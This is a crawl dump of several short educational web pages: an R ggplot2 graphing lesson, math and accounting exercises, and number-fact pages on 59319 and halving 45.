instance, is expressed as 4,500,000,000 years.\n\nAs one can see, expressing a huge number such as 4.5 billion in its numerical form would be not only unclear but also time-consuming because there is a potential that we will record a few zeros lesser or more.\n\nAs a result, people employ standard notation to express very big or very short values succinctly.\n\nIn the United Kingdom, standard notation is also referred to as scientific notation and is often used to write numbers in the order of powers of ten. The standard notation will differ based on the logical idea at hand.\n\nDepending on the nation a person is in, the standard form has varied connotations. 
Also, the Standard Notation is the most common style of writing numerals in the decimal system in the USA and other countries that use US norms.\n\n## What is Scientific Notation?\n\nScientific notation is a way of showing numbers that are either too large or too small to be represented in decimal notation. In the United Kingdom, it’s also known as the ‘scientific format.’\n\nOften, it’s used by researchers, mathematicians, and engineers for computations involving large numbers. Nonzero values are expressed in scientific notation as:\n\nm × 10ⁿ\n\nor m multiplied by ten raised to the power of n, where n is an integer and m is a non-zero real number. The integer n is referred to as the exponent, and the real number m is referred to as the significand or mantissa.\n\nAs noted in the beginning, scientific notation allows us to represent very large or small numbers by multiplying a single-digit integer by 10 raised to the relevant exponent.\n\nIf the value is very large, the exponent is positive; if it is very small, the exponent is negative.\n\n## Main Differences Between Standard Form and Scientific Notation\n\n1. The Standard form is commonly used to indicate exceedingly big or small values as well as quantities. The Scientific Form, on the other hand, is often used to describe exceedingly big or small quantities in decimal format.\n2. Figures written in standard form can be compared against numbers in scientific notation by converting one notation to the other. To convert a figure to scientific notation, raise the power of ten by one for each place the decimal point is moved to the left.\n3. The standard form is a far superior alternative for quickly writing down a value in a short amount of time. The scientific form, on the other hand, is preferable for learning the fundamentals of notation.\n4. Values documented in standard form can be compared to numbers written in scientific notation by transforming one quantity to another. Figures in scientific notation can be displayed in a variety of ways. Another method to express the figure 6 × 10⁹ is 6e+9.\n5. Before someone compares 3.4 × 10⁷ and 4,500,000, they should convert 3.4 × 10⁷ to 34,000,000 or 4,500,000 to 4.5 × 10⁶. That is an example of standard form. The world's population, by contrast, is estimated to be around 5,000,000,000 people. 5 × 1,000,000,000 is the same as 5,000,000,000, and the number 1,000,000,000 is equivalent to 10⁹, so the population can be written as 5 × 10⁹. This is an instance of scientific notation.", null, "" ]
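Point 5 above is easy to demonstrate in code; the following sketch (my addition) converts both quantities to one notation before comparing them:

```python
a = 3.4e7          # 3.4 x 10^7 = 34,000,000
b = 4_500_000      # 4.5 x 10^6
print(a > b)       # True -- obvious once both numbers are in the same notation
print(f"{b:.1e}")  # 4.5e+06
```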
[ null, "https://askanydifference.com/wp-content/plugins/chp-ads-block-detector/assets/img/icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9186757,"math_prob":0.9491417,"size":7198,"snap":"2023-40-2023-50","text_gpt3_token_len":1585,"char_repetition_ratio":0.17862107,"word_repetition_ratio":0.03829417,"special_character_ratio":0.23020284,"punctuation_ratio":0.12082445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9810484,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-01T06:23:56Z\",\"WARC-Record-ID\":\"<urn:uuid:19ff3776-cb01-4f5f-ae3d-b41b1084eee9>\",\"Content-Length\":\"506402\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:05a4f318-5d0a-4327-83f6-4af22aaac8c7>\",\"WARC-Concurrent-To\":\"<urn:uuid:2ea2a097-831c-480e-a9ca-3b2b658254f9>\",\"WARC-IP-Address\":\"50.16.223.119\",\"WARC-Target-URI\":\"https://askanydifference.com/difference-between-standard-form-and-scientific-form/\",\"WARC-Payload-Digest\":\"sha1:53CHHDTNIVEOFLDC4TNXW3UBBLGVNEAG\",\"WARC-Block-Digest\":\"sha1:PYVEURWEQ3A6X3HXYPTTFQFJPELK4W7B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510781.66_warc_CC-MAIN-20231001041719-20231001071719-00059.warc.gz\"}"}
http://www.alamandamaths.com/number-and-algebra/real-number/recurring-decimals/
[ "# Recurring Decimals\n\n## Investigate terminating and recurring decimals (ACMNA184)\n\nLO:To understand recurring decimals\nKnow:\n\n• the structure of decimal numbers.\n\nUnderstand:\n\n• that recurring decimals are numbers that continue on forever.\n• that terminating decimals are decimal numbers that end\n\nDo:\n\n• I can find recurring decimals.\n\n## Terminating decimals are decimal numbers that stop or end", null, "## Recurring decimals are decimal numbers that repeat forever.", null, "## Common Recurring Decimals", null, "" ]
[ null, "https://i0.wp.com/www.alamandamaths.com/wp-content/uploads/2015/10/184914038.gif", null, "https://i2.wp.com/www.alamandamaths.com/wp-content/uploads/2015/10/846693107.gif", null, "https://i1.wp.com/www.alamandamaths.com/wp-content/uploads/2015/10/4964688_orig.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.66511256,"math_prob":0.9767319,"size":305,"snap":"2019-51-2020-05","text_gpt3_token_len":61,"char_repetition_ratio":0.22591361,"word_repetition_ratio":0.0,"special_character_ratio":0.19344263,"punctuation_ratio":0.14583333,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9918444,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,5,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-25T18:49:10Z\",\"WARC-Record-ID\":\"<urn:uuid:f3135d17-bfc9-4f04-9b0e-e8cb3e867ba6>\",\"Content-Length\":\"108577\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9897e45b-d81f-4d87-b181-3c6ebf1bb8d0>\",\"WARC-Concurrent-To\":\"<urn:uuid:daf5cb8e-fd31-43ff-8ddb-87b7e55e1a11>\",\"WARC-IP-Address\":\"166.62.28.136\",\"WARC-Target-URI\":\"http://www.alamandamaths.com/number-and-algebra/real-number/recurring-decimals/\",\"WARC-Payload-Digest\":\"sha1:53GIYSE56VS7CONSB3HZA2UWFU5CO5PV\",\"WARC-Block-Digest\":\"sha1:6YQFG6SZRFJAEYRMHWWQEIPCXSWJHDPK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251678287.60_warc_CC-MAIN-20200125161753-20200125190753-00223.warc.gz\"}"}
https://optimisticcoder.com/programming-examples-of-areas-in-python/
[ "# Programming Examples of Areas in Python: Important Examples\n\nHere are some programming examples of areas in Python language to give you an idea of programming works to calculate areas in python and which syntax is used to perform any specific task. Examples will be provided in sequential order to get you an easy understanding of the language. So, as usual, first, let’s start by calculating the area of the circle.\n\n## Calculating Areas in Python Language\n\n### 1. Area of Circle in Python\n\n```radius = int(input(\"Enter Radius of the Circle: \"))\narea = 3.14 * radius ** 2\nprint(\"Area of Circle: {0: .2f} \".format (area))\n```\n\n#### Output:\n\nEnter Radius of the Circle: 4\nArea of Circle: 50.24\n\n### 2. Area of Triangle in Python\n\n```b = int(input (\"Enter Breadth: \"))\nh = int(input(\"Enter Height: \"))\narea =(b * h) / 2\nprint(\"Area of triangle : {0:.2f} \".format (area))\n```\n\n#### Output:\n\nEnter Height: 20\nArea of triangle : 150.00\n\n### 3. Area of Equilateral Triangle in Python\n\n```import math\nside = int(input(\"Enter the length of Side: \"))\narea = (math.sqrt(3) * (side ** 2)) / 4\nprint(\"Area of Equilateral triangle: {0: .2f} \".format (area))\n```\n\n#### Output:\n\nEnter the length of Side: 5\nArea of Equilateral triangle: 10.83\n\n### 4. Area of Rectangle in Python\n\n```len = int (input(\"Enter length of Rectangle: \"))\nbre= int(input(\"Enter breadth of Rectangle: \"))\narea = len * bre\nprint(\"Area of Rectangle:\", area)\n```\n\n#### Output:\n\nEnter length of Rectangle: 5\nArea of Rectangle: 30\n\n### 5. Area of Square in Python\n\n```side = int(input(\"Enter length of Side: \"))\narea = side ** 2\nprint(\"Area of Square\", area)\n```\n\n#### Output:\n\nEnter length of Side: 8\nArea of Square 64\n\n### 6. Area of Rhombus in Python\n\n```print(\"Enter values of diagonals: \")\nd1 = int(input(\"D1: \"))\nd2 = int(input( \"D2: \"))\narea = (d1 * d2) / 2\nprint(\"Area of Rhombus:\", area)\n```\n\n#### Output:\n\nEnter values of diagonals:\nD1: 15\nD2: 21\nArea of Rhombus: 157.5\n\n### 7. Area of Pentagon in Python\n\n```from math import sqrt\nside = int(input(\"Enter length of Side: \"))\narea = (sqrt(5 * (5 + 2 * (sqrt(5)))) * side * side) / 4\nprint(\"Area of Pentagon {0: .2f} \".format (area))\n```\n\n#### Output:\n\nEnter length of Side: 15\nArea of Pentagon 387.11\n\n### 8. Area of Hexagon in Python\n\n```from math import sqrt\nside = int(input(\"Enter length of Side: \"))\narea = (3 * sqrt(3) * side * side) / 2\nprint(\"Area of Hexagon {0:.2f} \".format (area))\n```\n\n#### Output:\n\nEnter length of Side: 3\nArea of Hexagon 23.38\n\n### 9. Area of Heptagon in Python\n\n```side = int(input(\"Enter the value of Side: \"))\napo = float(input( \"Enter the value of Apothem: \"))\nperi = 7 * side\narea = (peri * apo) / 2\nprint(\"Area of Heptagon: {0: .2f} \".format(area))\n```\n\n#### Output:\n\nEnter the value of Side: 7\nEnter the value of Apothem: 7.4\nArea of Heptagon: 181.30\n\n### 10. Area of Regular Octagon in Python\n\n```from math import sqrt\nside = int(input(\"Enter length of Side: \"))\narea = 2 * (1 + sqrt(2)) * side ** 2\nprint(\"Area of Regular Octagon: {0:.2f} \".format(area))\n```\n\n#### Output:\n\nEnter length of Side: 3\nArea of Regular Octagon: 43.46\n\n### 11. 
Area of Trapezoid in Python\n\n```print(\"Enter values for bases: \")\nb1 = int(input(\"B1: \"))\nb2 = int(input(\"B2: \"))\nh = int(input(\"Enter height (H): \"))\narea = ((b1 + b2) * h) / 2\nprint(\"Area of Trapezoid\", area)\n```\n\n#### Output:\n\nEnter values for bases:\nB1: 5\nB2: 10\nEnter height (H): 14\nArea of Trapezoid 105.0\n\n## Conclusion\n\nI hope I have given you all the important programming examples of areas in Python. One important tip for all Python beginners: please take care of indentation! Do you agree with me? Please leave a comment. I hope you like the content and the information shared here. If you found this post helpful and learned something new and interesting today, then please share it with your friends and family members and help the Optimistic Coder spread informational content. Thank you." ]
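One small improvement worth considering (my suggestion, not from the original post): use `math.pi` rather than the 3.14 approximation in the circle example, and wrap the formulas in functions so they can be reused:

```python
import math

def circle_area(radius: float) -> float:
    # math.pi is more accurate than the hard-coded 3.14 used above
    return math.pi * radius ** 2

def trapezoid_area(b1: float, b2: float, h: float) -> float:
    return (b1 + b2) * h / 2

print(f"{circle_area(4):.2f}")    # 50.27 (vs 50.24 with the 3.14 approximation)
print(trapezoid_area(5, 10, 14))  # 105.0
```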
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.70592636,"math_prob":0.96353894,"size":3737,"snap":"2023-40-2023-50","text_gpt3_token_len":1099,"char_repetition_ratio":0.18644522,"word_repetition_ratio":0.113149844,"special_character_ratio":0.32271877,"punctuation_ratio":0.16558862,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9988736,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T22:45:44Z\",\"WARC-Record-ID\":\"<urn:uuid:62c774f5-c0b0-437c-abec-054963e63fdc>\",\"Content-Length\":\"107966\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dbaa75f6-50af-4bd8-a5a5-3c7244d45d9a>\",\"WARC-Concurrent-To\":\"<urn:uuid:dd534a2a-7004-4d49-9f75-27a82227e843>\",\"WARC-IP-Address\":\"185.210.145.93\",\"WARC-Target-URI\":\"https://optimisticcoder.com/programming-examples-of-areas-in-python/\",\"WARC-Payload-Digest\":\"sha1:NBU7RAEBCDO2EBEWMU52X4B4DZIJKBEF\",\"WARC-Block-Digest\":\"sha1:7CQNRUV75LOMZVJSQPI4RZGENT3YZLYJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100308.37_warc_CC-MAIN-20231201215122-20231202005122-00060.warc.gz\"}"}
https://qsmm.org/doc/qsmm-man.html-node/Setting-Instruction-Classes-Weights.html
[ "Next: , Previous: , Up: Executing a Multinode Model   [Contents][Index]\n\n#### 4.3.5 Setting Instruction Classes Weights\n\nIf the field `dont_use_instr_class_weights` of `qsmm_desc_s` structure passed to the function `qsmm_create` when creating a multinode model is zero, and the instruction emitting engine is a small actor, you can assign weights to instruction classes executed5 by a node of this model. The weights are multipliers for calculated probabilities of selection of those instruction classes by the instruction emitting engine assigned to its output signals by the function `qsmm_set_actor_sig_weight`. The function `qsmm_node_create_v2` initializes to 1 the weights of all instruction classes executable by a node.\n\nWarning: changing the weights of instruction classes leads to ill-defined behavior of built-in functions for computing the relative probability of an output signal by the instruction emitting engine. Therefore, avoid changing the weights of instruction classes if you use those built-in functions. See Number of Output Signals, for the explanation why the behavior becomes ill-defined.\n\nYou can use the following functions to query or set the weight of an instruction class specified by its index uniquely identifying the instruction class in an instruction class set.\n\nFunction: int qsmm_get_instr_class_weight (qsmm_t model, qsmm_sig_t node, qsmm_sig_t instr_class, double *weight_p)\n\nThis function retrieves the weight of an instruction class executable by a node of a multinode model. The argument node specifies the identifier of this node. The argument instr_class specifies the index of this instruction class in the instruction class set of this node. If weight_p is not `NULL`, the function sets *weight_p to retrieved weight.\n\nThe function returns a non-negative value on success or a negative error code on failure. Currently, the function can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nA node with identifier node does not exist.\n\n`QSMM_ERR_INVAL`\n\nThe argument instr_class is greater than or equal to the number of instruction classes in the instruction class set of the node.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\nFunction: int qsmm_set_instr_class_weight (qsmm_t model, qsmm_sig_t node, qsmm_sig_t instr_class, double weight)\n\nThis function sets to weight the weight of an instruction class executable by a node of a multinode model. The argument node specifies the identifier of this node. The argument instr_class specifies the index of this instruction class in the instruction class set of this node.\n\nThe function returns a non-negative value on success or a negative error code on failure. 
Currently, the function can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nA node with identifier node does not exist.\n\n`QSMM_ERR_INVAL`\n\nThe argument weight is negative or not finite, or instr_class is greater than or equal to the number of instruction classes in the instruction class set of the node.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\n`QSMM_ERR_NOMEM`\n\nThere was not enough memory to perform the operation.\n\nUse the following functions to query or set the weight of an instruction class specified by its name consisting of an instruction meta-class name and optional text parameters of this instruction class.\n\nFunction: int qsmm_get_instr_class_weight_by_name_f (qsmm_t model, qsmm_sig_t node, double *weight_p, const char *fmt, ...)\nFunction: int qsmm_set_instr_class_weight_by_name_f (qsmm_t model, qsmm_sig_t node, double weight, const char *fmt, ...)\n\nThe function `qsmm_get_instr_class_weight_by_name_f` retrieves the weight of an instruction class executable by a node of a multinode model. If weight_p is not `NULL`, the function sets *weight_p to retrieved weight. The function `qsmm_set_instr_class_weight_by_name_f` sets to weight the weight of an instruction class executable by a node of a multinode model.\n\nThe argument model specifies a multinode model handle. The argument node specifies a node identifier. The argument fmt and subsequent arguments interpreted as in the function `printf` specify an instruction class name: a sequence of zero or more whitespace characters, an instruction meta-class name optionally followed by a sequence of one or more whitespace characters and the text parameters of this instruction class, and a sequence of zero or more whitespace characters.\n\nBefore searching the instruction class in the instruction class set of this node, the functions convert the formatted name to the canonical form: the instruction meta-class name optionally followed by the space character and the text parameters of this instruction class converted to their canonical form according to rules described in Setting Text Instruction Parameters.\n\nThe functions return a non-negative value on success or a negative error code on failure. 
Currently, the functions can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nA node with identifier node does not exist, or the instruction class not found in the instruction class set of this node.\n\n`QSMM_ERR_INVAL`\n\nThe argument weight is negative or not finite, or an instruction class name has invalid format.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\n`QSMM_ERR_ILSEQ`\n\nUnable to convert an instruction class name to a wide string according to a current locale.\n\n`QSMM_ERR_NOMEM`\n\nThere was not enough memory to perform the operation.\n\nFor example, to set the weight of ‘move north’ instruction class to 0 to disable moving an agent in the north direction, use a line of code like this:\n\n```qsmm_set_instr_class_weight_by_name_f(qsmm,node,0,\"move north\");\n```\n\nUse the following function to set to the same value the weights of all instruction classes derived from an instruction meta-class for a node.\n\nFunction: int qsmm_set_instr_meta_class_weight (qsmm_t model, const char *instr_meta_class_name, qsmm_sig_t node, double weight)\n\nThis function sets the weights of all instruction classes derived from an instruction meta-class instr_meta_class_name and executable by a node of a multinode model to weight divided by the number of those instruction classes. The argument node specifies the identifier of this node.\n\nThe function returns a non-negative value on success or a negative error code on failure. Currently, the function can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nThe instruction meta-class instr_meta_class_name not found, or a node with identifier node does not exist, or there are no instruction classes derived from that instruction meta-class in the instruction class set of this node.\n\n`QSMM_ERR_INVAL`\n\nThe argument weight is negative or not finite.\n\n`QSMM_ERR_TYPE`\n\nAn entity named instr_meta_class_name is not an instruction meta-class. The entity is an instruction class set.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\n`QSMM_ERR_NOMEM`\n\nThere was not enough memory to perform the operation.\n\nThe function `qsmm_node_call_default` sets the weights of output signals of instruction emitting engine equal to the weights of instruction classes executable by a node on transferring control to it—calling the node or returning control to it from another node. The aforementioned functions for setting the weights of instruction classes immediately update the weights of corresponding output signals of instruction emitting engine if the model instance exists, the node call stack is not empty, and the identifier of a currently executed node is equal to node.\n\n#### Footnotes\n\n##### (5)\n\nHere and below, “the invocation/execution of an instruction class” means “the invocation/execution of an instruction belonging to an instruction class.”" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82480705,"math_prob":0.77621907,"size":7243,"snap":"2022-27-2022-33","text_gpt3_token_len":1406,"char_repetition_ratio":0.23097113,"word_repetition_ratio":0.44753945,"special_character_ratio":0.18086429,"punctuation_ratio":0.07896924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.954372,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T18:55:42Z\",\"WARC-Record-ID\":\"<urn:uuid:c494faf5-5d0c-4a93-aa33-0f6e2514928d>\",\"Content-Length\":\"14532\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6d335549-d57e-414a-bf0e-13e274974cca>\",\"WARC-Concurrent-To\":\"<urn:uuid:e76887cf-b106-4a82-8582-28fc202c62f2>\",\"WARC-IP-Address\":\"168.119.91.111\",\"WARC-Target-URI\":\"https://qsmm.org/doc/qsmm-man.html-node/Setting-Instruction-Classes-Weights.html\",\"WARC-Payload-Digest\":\"sha1:XQM456PLHZ2TJRXI6FNLWR5GLWMRC7SL\",\"WARC-Block-Digest\":\"sha1:DTEIXUJAJFLLS36MC3YPIOHOTCJN5VJY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103877410.46_warc_CC-MAIN-20220630183616-20220630213616-00557.warc.gz\"}"}
https://www.cheatography.com/mkpeacock/cheat-sheets/php-fundamentals/
# PHP Fundamentals Cheat Sheet by mkpeacock

Fundamentals of PHP

### Classes and Objects

```php
class SomeClass {
    private $property;
    public $anotherProperty;
    protected $yetAnotherProperty = null;

    public function __construct($arg = null) {
        $this->property = $arg;
    }
    public function someMethod() {
        echo "Hi";
    }
    public function getProperty() {
        return $this->property;
    }
    public function setProperty($p) {
        $this->property = $p;
    }
}
$myObject = new SomeClass("123");
echo $myObject->getProperty(); // 123
$myObject->property; // ERROR: private
```

### Variables

```php
$variableName;
$variableName = "Some String";
$variableName = 'Some String';
$variableName = strtoupper('text');
$variableName = 5;
$variable = "Some {$otherVariable} info";
echo $variableName;        // output
$newVar = $var1 . $var2;   // concatenation
```

### Functions

```php
function multiply($arg1, $arg2) {
    return $arg1 * $arg2;
}
$param = 4;
$param2 = 8;
$answer = multiply($param, $param2);
```

### Control Structure: IF

```php
// if something is true do something else
if ($something == true) {
    doSomethingElse();
} elseif ($something == false) {
    // however, if something is false, do something
    doSomething();
} else {
    // otherwise, lets do nothing
    doNothing();
}
```

### Control Structure: Loops

```php
foreach ($myArray as $key => $value) {
    echo "My array has the value {$value} stored against the key {$key}\n";
}
while ($someCondition == true) {
    echo 'hello';
}
```

### Numerical Operations

- Addition: `$variable = $variable + 5;`
- Subtraction: `$variable = $variable - 5;`
- Multiplication: `$variable = $variable * 5;`
- Division: `$variable = $variable / 5;`

### Arrays

- Create: `$myArray = array();`
- Push into: `$myArray[] = "Something";`
- Push to associative: `$myArray['key'] = "Value";`
- Create numeric: `$myArray = array('value', 'value2');`
- Create associative: `$a = array('key' => 'val');`
- Print from numeric: `echo $myArray[0];`
- Print from associative: `echo $myArray['key'];`
- Associative arrays: keys are strings
- Numeric arrays: keys are numbers: 0, 1, 2, 3, 4

### Control Structure: Switch

```php
switch ($someVariable) {
    case 1:
        echo "Some variable equals 1";
        break;
    case "cheese":
        echo "Some variable equals cheese";
        break;
    default:
        echo "No idea";
        break;
}
```

Comment (Sergey, 13:00 17 Sep 15): There is a mistake in the multiline comment. Should be `/* */`.
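The comments block that Sergey refers to was not captured in this copy of the sheet. For reference, and as a standard-language note rather than a quote from the original sheet, PHP's comment syntax is:

```php
// single-line comment
#  also a single-line comment (shell style)
/* a multi-line
   comment */
```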
https://usmam.org/what-is-the-rate-at-which-an-object-moves/
## Presentation on theme: "1) Speed: the rate at which an object moves or the rate of change of position. It depends on distance and time." (presentation transcript)

Slides 1–3: (title graphics only)

4. 1) Speed: the rate at which an object moves, or the rate of change of position. It depends on distance and time.

5. 2) Average speed is found by dividing the total distance by the total time. Speed = distance / time

6. (graphic only)

7. 3) Constant means "does not change," so constant speed is speed that does not change. Like cruise control in a car!

8. Because speed is a ratio of distance over time, the units for speed are distance units over time units.

9. 3.2 Speed vs. time graphs: The position vs. time graph has position on the y-axis and time on the x-axis. Which runner has the fastest constant speed?

10. (graphic only)

11. 4) Velocity is speed in a direction. Ex: 55 m/s north. If you change speed OR you change direction, you've changed velocity.

12. Quick check: which of the following are velocities and which are speeds? a) 25 m/s forward b) 1500 km/h c) 55 m/h south d) 35 m/s up

13. 5) Acceleration is the rate of change of speed: the change in speed divided by the change in time. Acceleration can be an increase in velocity, a decrease in velocity, OR a change in direction.

14. 6) If there is no change in speed but there is a change in direction, acceleration has occurred.

15. 3.3 Acceleration and direction: A car driving around a curve at a constant speed is accelerating because the direction is changing.

16. 7) If the value for acceleration is positive, the object is speeding up. If the value is negative, the object is slowing down (also called deceleration).

17. You do the math: 1) What is the speed of an object that travels 40 meters in 2 seconds? 2) What is the speed of an object that travels 50 meters in 100 seconds? 3) How fast is a car accelerating when it speeds up from 50 mph to 60 mph in ten seconds?
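A quick worked check of the "You do the math" problems above (problem 3 assumes the acceleration is constant):

1) speed = 40 m / 2 s = 20 m/s
2) speed = 50 m / 100 s = 0.5 m/s
3) acceleration = (60 mph - 50 mph) / 10 s = 1 mph per second (about 0.45 m/s²)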
18. 3.3 Acceleration and motion graphs: The position vs. time graph shows acceleration more clearly. This graph is a curve when there is acceleration.

19. 8) An object is in free fall if it is accelerating due to the force of gravity and no other forces are acting on it. Objects in free fall on Earth accelerate downward (that means they get faster as they fall).

20. 9) Falling objects increase their speed by 9.8 m/s every second, or 9.8 m/s²; this is their acceleration due to gravity.

21. 10) A projectile is an object moving under the influence of only gravity. A moving soccer ball is an example of a projectile.

22. EXTRAS!

23. 3.2 The position vs. time graph: Position vs. time data tells you the runner's position at various points in time. The runner is at 50 meters after 10 sec., 100 meters after 20 sec., and 150 meters at 30 sec.

24. 3.2 Graphs show relationships: A good way to show a relationship between two variables is to use a graph. A graph makes it easy to see if changes in one variable cause changes in the other variable (the effect).

25. 3.2 Slope: You can use position vs. time graphs to quickly compare the speeds of different objects. A steeper line on a position vs. time graph means a faster speed.

26. 3.2 Speed vs. time graphs: These graphs each show the same event. What differences do you notice?
https://math.stackexchange.com/questions/1192961/knuths-mastermind-algorithm/1193037#1193037
[ "# Knuth's mastermind algorithm\n\nI read the other thread regarding Knuth's algorithm and mastermind but I still do not understand quite how it would be implemented. I am confused by the language or my brain is just broken (or both).\n\nI understand that you start with a list S of all possible permutations based on the particular game's parameters, for example a list of 1296 possible 4-digit combinations where each digit can be a number 1-6 (including repeats).\n\nYou create a 4 digit secret code.\n\nYou play a guess (from the list S) against the secret code and receive a response in terms of black and white \"pegs\", where each black peg means the guess has the right digit in the right spot, and each white peg means the guess has the right digit in the wrong spot.\n\nAccording to Knuth, you should always use 1122 as the first guess, from which you get a response in terms of black and white pegs.\n\nThen, in order to reduce the number of possible guesses for the next turn and eventually find the right code, if the response is not 4 black pegs (meaning the code has been guessed correctly and the game's over), we are to remove from S any element (guess, code, whatever you want to call it) that would not give the same response if it (the guess/code/element in S) were the code.\n\nWhat does that mean? Is anyone else confused by that wording?\n\nI do not understand what comparison is being made here. To me, this means that if the response to the first guess of 1122 is one black, one white, we would remove from S all of the potential guesses that, when played against the secret code, would not return the same response of one black, one white. That would of course leave us with a list of possibilities that would not contain the correct answer, because it would just be a list of elements that would all get a response of one black, one white.\n\nSo I see that obviously that can't be what it means, so the alternative is to say \"OK it must mean that you should remove from S every potential guess that also returns the one black, one white) answer and go from there.\" That makes more sense than my initial interpretation but it still doesn't feel right.\n\nCan anyone help explain this using multiple examples? I cannot wrap my head around what comparison is being made and what two things are actually being compared in order to remove elements from S.\n\n• You don't create a 4-digit secret code. Your opponent does. Perhaps this is the source of your confusion. Mar 16, 2015 at 22:40\n• Thanks TonyK but no, that is not the issue. I understand how the game works, I am just trying to understand the logic of Knuth's algorithm. I was hung up on the language used to describe narrowing the list of S which I would argue is ambiguous (at least as it exists in the Wikipedia article). Mar 17, 2015 at 4:57\n• There's comprehensive explanation on this link for all mastermind strategies: serkangur.freeservers.com Jun 6, 2016 at 16:42\n\nLet's say $S_i$ is an element of $S$, the possible values of the winning code.\n\nWhat you're asking of each $S_i$ at the step you're puzzling about is this:\n\nIf the answer were $S_i$, would I have gotten the response I got with my current guess?\n\nIf the answer is no, then $S_i$ cannot be the code, because you would have gotten a different response. If the answer is yes, then you keep that around for another turn, because it's consistent with the response you got. 
In other words, you can't eliminate it as impossible.

Looking at the example in the other thread:

You guess $1122$ and get one black peg (one peg color correct and in the right position) and one white peg (one peg color correct but in the wrong position).

The step of reducing the list involves asking, for every $S_i$, "Would I have gotten one black peg and one white peg with my guess of $1122$ if the code were $S_i$?"

OK, so let's do a few:

• If the code were $1111$ I would have gotten two black pegs ($BB$) with my guess of $1122$, which is not the same as one black peg and one white peg ($BW$). (Represent this by $F(1122, 1111) = BB$.) So, I remove $1111$ from the list of potential solutions.
• $F(1122, 1112) = BBB \neq BW \to \text{Remove 1112 from S}$
• $F(1122, 1113) = BB \neq BW \to \text{Remove 1113 from S}$
• $F(1122, 1114) = BB \neq BW \to \text{Remove 1114 from S}$
• $F(1122, 1115) = BB \neq BW \to \text{Remove 1115 from S}$

And so forth.

However,

• $F(1122, 1314) = BW = BW \to \text{Keep 1314 in S}$

Hope this helps.

• Ok, I think this has helped me understand my hangup -- when removing elements from S, rather than bumping each element in S against the actual secret code, we're bumping each element in S against the most recent guess. So once we start eliminating the elements from the list S, we're basically forgetting the real code for a moment and comparing each element to the most recent guess? Mar 17, 2015 at 4:53
• Yes. The actual secret code is in $S$. Each guess is in $S$ (or should be, if you're playing to win!) and eliminates a bunch of candidate secret codes based on the response. This reduces the number of members in $S$, and you guess again (again, using one of the remaining members of $S$) until you win.
– John
Mar 18, 2015 at 19:23
• "If the code were 1111 I would have gotten two black pegs": how do you know that? You might just as well have ended up with 0 blacks and 0 whites, taking into account that we don't know if the black peg represents the 1 or the 2 value. And you also don't know if it is a 1 or a 2 that is out of position. Nov 14, 2016 at 20:19
• @Nulle Earlier in my answer I wrote: "You guess 1122 and get one black peg ... and one white peg ..." Based on this particular guess (1122) and the response to this guess (one black, one white), the actual code cannot be 1111.
– John
Nov 14, 2016 at 23:12
• I don't think it's quite as simple as this. Knuth was rather considering, for each possible clue that a code might receive, how much the remaining possible codes would be reduced. Knuth actually pointed out that the code to guess next might actually be impossible based on previous clues, yet would still most reduce the potential codes remaining and should still be guessed (that is, even knowing that it is not the correct code) to ensure that the correct code is actually guessed within five guesses. Aug 1, 2018 at 2:59
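To make the reduction step concrete, here is a minimal Python sketch of the response function $F$ and the filtering of $S$. It is only the consistency filter described above, not Knuth's full minimax guess selection, and all names are choices of this sketch:

```python
from itertools import product

def score(guess, code):
    """Return (black, white) pegs for `guess` played against `code`."""
    black = sum(g == c for g, c in zip(guess, code))
    # Colors in common, counted with multiplicity; whites are those
    # common colors that are not already exact (black) matches.
    common = sum(min(guess.count(d), code.count(d)) for d in set(guess))
    return black, common - black

S = list(product("123456", repeat=4))     # all 1296 candidate codes
guess, response = tuple("1122"), (1, 1)   # suppose 1122 scored one black, one white
# Keep only the candidates that would have produced the same response
S = [code for code in S if score(guess, code) == response]
print(len(S))   # the surviving candidates after one round of filtering
```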
https://blogs.helsinki.fi/kulikov/2011/10/12/product-of-topological-spaces/
# The Product of Topological Spaces Does Not Obey Cancellation

